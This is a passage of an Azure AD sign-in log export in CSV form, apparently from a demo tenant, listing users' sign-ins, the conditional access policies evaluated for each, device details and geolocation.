'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",268d392c-7163-4a17-b774-5f4fbf551b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,268d392c-7163-4a17-b774-5f4fbf551b00,SigninLogs,Sucess,50.6406517,5.572050095
+417,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:47.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",ce4fc97e-3f64-4ad9-ab37-6ed885df1100,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ce4fc97e-3f64-4ad9-ab37-6ed885df1100,SigninLogs,Sucess,51.4458313,-0.969720006
+418,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:05.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3ca07030-42de-42fb-af92-5c5f4435bbad,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ac9a90bc-e2ad-45f7-b2a8-b415040f1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,ac9a90bc-e2ad-45f7-b2a8-b415040f1300,SigninLogs,Sucess,33.7984581,-84.38828278
+419,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:41.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c8fe3b24-efaa-446f-b060-b6e6ef6073ff,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179ea9581200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,62115b57-0cb2-458e-8ba0-179ea9581200,SigninLogs,Sucess,33.7984581,-84.38828278
+420,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,812d4f5b-5d06-4f3d-b580-3ef3ba0e60e8,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",07569406-a371-436b-8ece-f602be9a2400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,07569406-a371-436b-8ece-f602be9a2400,SigninLogs,Failed,47.68061829,-122.1869888
+421,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:53.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7560db45-5881-4eb7-b361-9285c5f05759,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:58,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",25f05980-005b-42e3-92bb-87a3eeb15900,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,25f05980-005b-42e3-92bb-87a3eeb15900,SigninLogs,Sucess,32.32146072,34.85319901
+422,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:14.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1b0d7503-d1d5-422d-a8ce-5ca87e2f084e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ad09f59c-2ec1-4ebf-90ab-0f259a141c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ad09f59c-2ec1-4ebf-90ab-0f259a141c00,SigninLogs,Sucess,50.6406517,5.572050095
+423,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76de5006-710b-4e5f-8c8f-93d71f6d4a49,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4d916265-6489-4572-bed8-58616f0d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4d916265-6489-4572-bed8-58616f0d1a00,SigninLogs,Sucess,36.6404686,-78.26995087
+424,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:47.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3eb96fa0-2764-4185-ab0f-c7365f321059,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Dynamics 365 Portal,bab47555-038a-4434-a931-96cc6091cdd7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",a54beb90-f65e-4146-ae84-8533dca02700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],{'errorCode': 